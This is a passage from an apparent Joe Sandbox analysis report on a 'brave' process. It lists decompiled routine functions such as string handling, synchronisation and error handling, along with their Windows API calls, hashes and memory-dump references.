0x7ff715ba8e5d
0x7ff715ba8e63
0x7ff715ba8e67
0x7ff715ba8e6c
0x7ff715ba8e77
0x7ff715ba8e80
0x7ff715ba8e86
0x7ff715ba8e8b
0x7ff715ba8e93
0x7ff715ba8e9d
0x7ff715ba8ea8
0x7ff715ba8eae
0x7ff715ba8eb6
0x7ff715ba8ec0
0x7ff715ba8ed1

APIs

Part of subcall function 00007FF715BA7560: WaitForMultipleObjects.KERNEL32 ref: 00007FF715BA75D4

ResetEvent.KERNEL32 ref: 00007FF715BA8E77
WaitForSingleObject.KERNEL32 ref: 00007FF715BA8EF0

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Wait$EventMultipleObjectObjectsResetSingle
String ID:
API String ID: 256776027-0
Opcode ID: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction ID: b2486e7b7c6961f0194f6f6f5413b3cfe02de5dab59e2883b75835ce7d2a357d
Opcode Fuzzy Hash: 121a88b0db4ee25a2ff43eadc307b2352640e593a580d7043225a0e0878fb419
Instruction Fuzzy Hash: 51513A15E0CC0381FA7F7526954537AC0926F84FB4FD40432EA0E86AF2EFADA94D9261

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBEC70 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF715BBEC82
memcpy.MSVCRT ref: 00007FF715BBECD4
memcpy.MSVCRT ref: 00007FF715BBED90

Strings

basic_string::append, xrefs: 00007FF715BBED2A, 00007FF715BBEDE8

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction ID: 95d92553bf06216cd7cf2f6e0a4f9f7e7a979ee360761c32c584db76c92278d8
Opcode Fuzzy Hash: 6cebfcec6de9b3593e030ed6678d1432fc8d21d84097160306933d0743cdec40
Instruction Fuzzy Hash: 8351AC62A19E4584EA38EB15C4094BDA321FB45FE4BD88532DE1D473F0EFB9E649C318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBBAC0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 158stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF715BBBAD2
memcpy.MSVCRT ref: 00007FF715BBBB22
memcpy.MSVCRT ref: 00007FF715BBBBDD

Strings

basic_string::append, xrefs: 00007FF715BBBB7D, 00007FF715BBBC3B

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction ID: f138aaf9b3802c43bc664d0c8f0dbc8297435fc26640dc04db17d546bba91194
Opcode Fuzzy Hash: e52a5d2963f204db0f47163310a085c06c72244473eb4e09b667bfb4340310bf
Instruction Fuzzy Hash: 6C510263A08E4A86DA38EA15C45857DB360FB45FE0FC84532EE6E473A1DF6CD249C318

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BC0750 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BC0750(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0x15bc07c0;
				if (_t18 == 1) goto 0x15bc07b0;
				if (_t18 != 0) goto 0x15bc07a0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}

0x7ff715bc075a
0x7ff715bc075e
0x7ff715bc0769
0x7ff715bc076d
0x7ff715bc0770
0x7ff715bc077a
0x7ff715bc0780
0x7ff715bc0785
0x7ff715bc0789
0x7ff715bc078d
0x7ff715bc079b

Strings

basic_string::basic_string, xrefs: 00007FF715BC0841, 00007FF715BC0898
basic_string::_M_create, xrefs: 00007FF715BC07F7
string::string, xrefs: 00007FF715BC08E8
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BC0848, 00007FF715BC089F, 00007FF715BC08EF

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction ID: ee4a79fdc3c5d246ccc9cb59738458e755e0969003927f5f2e0310cb67eb8ecc
Opcode Fuzzy Hash: 66f3f228ea3a18784f6c83e61baa3469eb30d59ff27e738029579d98566150f7
Instruction Fuzzy Hash: 7941B372B15F4694EA38AF29D4404ACA360FB18FA4BD45632CA1D573B0EF3CD59AC354

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BC0290 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BC0290(long long* __rcx, void* __rdx) {
				long long _t14;
				signed long long _t16;
				signed long long _t18;
				signed long long _t19;

				_t19 =  *((intOrPtr*)(__rdx + 8));
				_t16 = _t19 + _t19;
				_t14 = __rcx + 0x10;
				_t18 = _t16 >> 1;
				 *__rcx = _t14;
				if (_t16 - 0xe > 0) goto 0x15bc0300;
				if (_t18 == 1) goto 0x15bc02f0;
				if (_t18 != 0) goto 0x15bc02e0;
				 *(__rcx + 8) = _t18;
				 *((short*)(_t14 + _t19 * 2)) = 0;
				return 0;
			}

0x7ff715bc029a
0x7ff715bc029e
0x7ff715bc02a9
0x7ff715bc02ad
0x7ff715bc02b0
0x7ff715bc02ba
0x7ff715bc02c0
0x7ff715bc02c5
0x7ff715bc02c9
0x7ff715bc02cd
0x7ff715bc02db

Strings

basic_string::basic_string, xrefs: 00007FF715BC0381, 00007FF715BC03D8
basic_string::_M_create, xrefs: 00007FF715BC0337
string::string, xrefs: 00007FF715BC0428
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BC0388, 00007FF715BC03DF, 00007FF715BC042F

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-126128797
Opcode ID: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction ID: d1aa62bcdee501578d5165b33562ee67d70bd1349951f04d4eeb816590875655
Opcode Fuzzy Hash: fa530074e51c7f9f7c906e36678571559d185e73af13ed167796c0c752426d85
Instruction Fuzzy Hash: 7C41C372B15F4695EA38AF29D4404ACA360EB58FA4BD44632CA1D473B0EF3CE59AC314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA0640 Relevance: 7.6, APIs: 5, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA0640(void* __rax, intOrPtr* __rcx, void* __rdx) {
				void* _t4;
				void* _t20;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t24 = __rdx;
				_t20 = __rax;
				_t27 = __rcx;
				if (__rdx == 0) goto 0x15ba066f;
				E00007FF77FF715BA7400(_t4, __rdx);
				E00007FF77FF715BA73B0(_t20, _t24);
				if (_t20 - _t20 > 0) goto 0x15ba06b0;
				_t26 =  *_t27;
				_t1 = _t26 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0x15ba06d1;
				if (_t26 == 0) goto 0x15ba06e4;
				r13d = 1;
				 *_t26 = r13d;
				if ( *_t26 != 0) goto 0x15ba0708;
				if ( *((intOrPtr*)(_t26 + 4)) != 0) goto 0x15ba06f8;
				return 0;
			}

0x7ff715ba0640
0x7ff715ba0640
0x7ff715ba0650
0x7ff715ba0659
0x7ff715ba065b
0x7ff715ba0665
0x7ff715ba066d
0x7ff715ba066f
0x7ff715ba0673
0x7ff715ba067c
0x7ff715ba0681
0x7ff715ba0683
0x7ff715ba068c
0x7ff715ba0692
0x7ff715ba069b
0x7ff715ba06aa

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction ID: 4020573a47eeeb5ed9fe0052d5e394ebd42c46920981ba185afafbb3bc171a10
Opcode Fuzzy Hash: f49b37cc6554afe07983d2b0d8d35f3757fbd10da3a986622ae24d0176cd62df
Instruction Fuzzy Hash: 5041D922F18A5645FA7BBA29980C63B6195EF84FB4F844035DD1D463E0EF3CA889C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA04E0 Relevance: 7.6, APIs: 5, Instructions: 102
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA04E0(intOrPtr* __rcx) {
				intOrPtr* _t16;

				_t16 =  *((intOrPtr*)(__rcx));
				_t1 = _t16 + 3; // 0x3
				if (_t1 - 3 <= 0) goto 0x15ba0540;
				if (_t16 == 0) goto 0x15ba0550;
				 *_t16 = 1;
				if ( *_t16 != 0) goto 0x15ba0560;
				if ( *((intOrPtr*)(_t16 + 4)) != 0) goto 0x15ba0520;
				return 0;
			}

0x7ff715ba04e9
0x7ff715ba04ec
0x7ff715ba04f5
0x7ff715ba04fa
0x7ff715ba0503
0x7ff715ba0509
0x7ff715ba0512
0x7ff715ba051f

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF715BA0520

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction ID: bda4bf567befcfc606bf729d5094b951faef38fb63cdddc118aee8cda0a6c25e
Opcode Fuzzy Hash: a892f5a888edd9dfb3e980655216f5831920c2c6f9fa8653408e139a634474d4
Instruction Fuzzy Hash: 8D31A932F0991686FB7BAB25998972B6195EF40FB0F954435DE0C86290FF3CD889C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA52D0 Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00007FF77FF715BA52D0(void* __ecx, void* __rax, long long __rdx) {
				void* _t15;
				void* _t18;
				void* _t20;
				signed long long _t25;

				_t18 = __rax;
				_t15 = __ecx;
				r12d = GetLastError();
				E00007FF77FF715BA2D40(__ecx, __rdx);
				_t1 = _t18 + 0x68; // 0x68
				_t20 = _t18;
				E00007FF77FF715BA8830(_t1, __rdx);
				if ( *((intOrPtr*)(_t20 + 0x48)) - _t15 <= 0) goto 0x15ba5340;
				 *((long long*)( *((intOrPtr*)(_t20 + 0x50)) + _t25 * 8)) = __rdx;
				 *((char*)( *((intOrPtr*)(_t20 + 0x58)) + _t25)) = 1;
				E00007FF77FF715BA8870(_t1);
				SetLastError(??);
				return 0;
			}

0x7ff715ba52d0
0x7ff715ba52e0
0x7ff715ba52eb
0x7ff715ba52ee
0x7ff715ba52f3
0x7ff715ba52f7
0x7ff715ba52fd
0x7ff715ba5305
0x7ff715ba530b
0x7ff715ba5316
0x7ff715ba531a
0x7ff715ba5322
0x7ff715ba533a

APIs

GetLastError.KERNEL32 ref: 00007FF715BA52E5

Part of subcall function 00007FF715BA2D40: TlsGetValue.KERNEL32 ref: 00007FF715BA2DA0

SetLastError.KERNEL32 ref: 00007FF715BA5322
realloc.MSVCRT(00000000,?,?,00007FF715B914F6,00007FF715BA02FB,00000227AD1A17F0,00000000,00007FFC2FC93CA0,00007FF715B932FA), ref: 00007FF715BA5353
realloc.MSVCRT(00000000,?,?,00007FF715B914F6,00007FF715BA02FB,00000227AD1A17F0,00000000,00007FFC2FC93CA0,00007FF715B932FA), ref: 00007FF715BA5367
memset.MSVCRT ref: 00007FF715BA539D

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: ErrorLastrealloc$Valuememset
String ID:
API String ID: 2591390167-0
Opcode ID: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction ID: edc403bf6f78e8e5c9b96420fee92e8ffa971c087f38c95165a545f146a88a1e
Opcode Fuzzy Hash: c1310bef0b37995c8512101a0dfd18a475ef539f0a296ca77da5c8e920a0cdac
Instruction Fuzzy Hash: 4C21C722B15A4185EB3DBF2AA44057D6395EF44FA4F850031DD4E0B3A5DF7CD849C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA8880 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF715BA8898
ReleaseSemaphore.KERNEL32 ref: 00007FF715BA88C6
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA88D3
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA88F3
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA8918

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction ID: 5ff41919a458e200d8c520c3ccd9615f655feac98c85fa497c04eb2445064608
Opcode Fuzzy Hash: 50ea73615dfd6b47d2567a6e8e39e4969aa7ea6ce91bc3410475d5b7992722e5
Instruction Fuzzy Hash: D3012222F14A0642E65AAB1A7C95266D261BF98F72FC44436DD4D46260CF3C98CEC300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA9EC0 Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA9EC0(void* __rcx) {

				if (__rcx != 0) goto 0x15ba9ed8;
				return 0;
			}

0x7ff715ba9ecb
0x7ff715ba9ed4

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF715BA9ED8
OpenProcess.KERNEL32 ref: 00007FF715BA9EEF
CloseHandle.KERNEL32 ref: 00007FF715BA9EFD

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction ID: 47d193681bb7de72b55f895f2bf64f76a870fc5de524d20f1cb8e7018de222f0
Opcode Fuzzy Hash: 0481b6e7934421b3d5d1405471e27f862e5ab29bd4ffea2d44222b750cc16042
Instruction Fuzzy Hash: E5F09029E28D0382FB3E7B71545413A91A19F44F35F840934D52E482F1EF2C648C5270

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9EB03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00007FF77FF715B9EB03() {
				signed int _t8;
				void* _t12;
				void* _t17;
				signed int** _t20;

				asm("stc");
				 *((intOrPtr*)(_t17 + 0x41909090)) =  *((intOrPtr*)(_t17 + 0x41909090)) + _t12;
				_t8 =  *( *_t20);
				if ((_t8 & 0x20ffffff) == 0x20474343) goto 0x15b9ebf0;
				if (_t8 - 0xc0000096 > 0) goto 0x15b9ebd7;
				if (_t8 - 0xc000008b <= 0) goto 0x15b9eb88;
				if (_t8 + 0x3fffff73 - 9 > 0) goto 0x15b9eb78;
				goto __rax;
			}

0x7ff715b9eb03
0x7ff715b9eb0b
0x7ff715b9eb19
0x7ff715b9eb2c
0x7ff715b9eb37
0x7ff715b9eb42
0x7ff715b9eb4c
0x7ff715b9eb5c

APIs

signal.MSVCRT ref: 00007FF715B9EBAA

Strings

CCG , xrefs: 00007FF715B9EB26

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
